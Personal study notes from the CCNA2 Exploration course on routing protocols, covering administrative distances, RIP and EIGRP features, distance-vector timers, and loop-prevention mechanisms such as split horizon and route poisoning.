Classless routing protocols are RIPv2, EIGRP, OSPF, IS-IS, BGP.

Generally, RIP and IGRP are slow to converge, whereas EIGRP and OSPF are faster to converge.

Each routing protocol uses its own metric. For example, RIP uses hop count, IGRP and EIGRP use a combination of bandwidth and delay, and Cisco's implementation of OSPF uses bandwidth.

All the routing protocols discussed in this course are capable of automatically load balancing traffic for up to four equal-cost routes by default. EIGRP is also capable of load balancing across unequal-cost paths.

Administrative distance (AD) defines the preference of a routing source.
Only a directly connected network has an administrative distance of 0, which cannot be changed.
static route - AD 1

To see the AD value of a directly connected network, use the [route] option.

In 'show ip route', each route shows [administrative distance/hop count].

EIGRP internal route has the most trustworthy administrative distance by default

How many equal cost paths can a dynamic routing protocol use for load balancing by default? 4

When do directly connected networks appear in the routing table? As soon as they are addressed and operational at Layer 3.

20 - eBGP
90 - EIGRP (internal)
170 - EIGRP (external)
120 - RIP


Chapter 4 Distance Vector Routing Protocol

Periodic Updates are sent at regular intervals (30 seconds for RIP and 90 seconds for IGRP).

Distance vector routing protocols share certain characteristics:
periodic updates
broadcast updates
entire routing table updates

invalid timer : 180s
flush timer : 240s
holddown timer : 180s

Holddown Timer. This timer stabilizes routing information and helps prevent routing loops during periods when the topology is converging on new information. Once a route is marked as unreachable, it must stay in holddown long enough for all routers in the topology to learn about the unreachable network. By default, the holddown timer is set for 180 seconds.

EIGRP uses updates that are:
Non-periodic because they are not sent out on a regular basis.
Partial updates sent only when there is a change in topology that influences routing information.
Bounded, meaning the propagation of partial updates is automatically bounded so that only those routers that need the information are updated.

Note: Collisions are only an issue with hubs and not with switches.

To prevent the synchronization of updates between routers, the Cisco IOS uses a random variable, called RIP_JITTER,

Distance vector routing protocols are simple in their operations. Their simplicity results in protocol drawbacks like routing loops.

There are a number of mechanisms available to eliminate routing loops, primarily with distance vector routing protocols. These mechanisms include:
Defining a maximum metric to prevent count to infinity
Holddown timers
Split horizon
Route poisoning or poison reverse
Triggered updates

Holddown timers are used to prevent regular update messages from inappropriately reinstating a route that may have gone bad

Holddown timers also help prevent the count to infinity condition.

The split horizon rule says that a router should not advertise a network through the interface from which the update came.

Route poisoning is used to mark the route as unreachable in a routing update that is sent to other routers.

Route poisoning speeds up the convergence process as the information about spreads through the network more quickly than waiting for the hop count to reach "infinity".

Note: Split horizon is enabled by default. However split horizon with poison reverse may not be the default on all IOS implementations.

Features of RIP:
Supports split horizon and split horizon with poison reverse to prevent loops.
Is capable of load balancing up to six equal cost paths. The default is four equal cost paths.

EIGRP features include:
Triggered updates (EIGRP has no periodic updates).
Use of a topology table to maintain all the routes received from neighbors (not only the best paths).
Establishment of adjacencies with neighboring routers using the EIGRP hello protocol.
Support for VLSM and manual route summarization. These allow EIGRP to create hierarchically structured large networks.

RIP and IGRP are distance vector routing protocols characterized by periodic updates that are broadcast to directly connected neighbours. The entire routing table is sent in the update.

Three routers running a distance-vector routing protocol lost all power, including the battery backups. When the routers reload, they will send updates that include only directly connected routes to their directly connected neighbours.

(All notes taken from CCNA2 Exploration)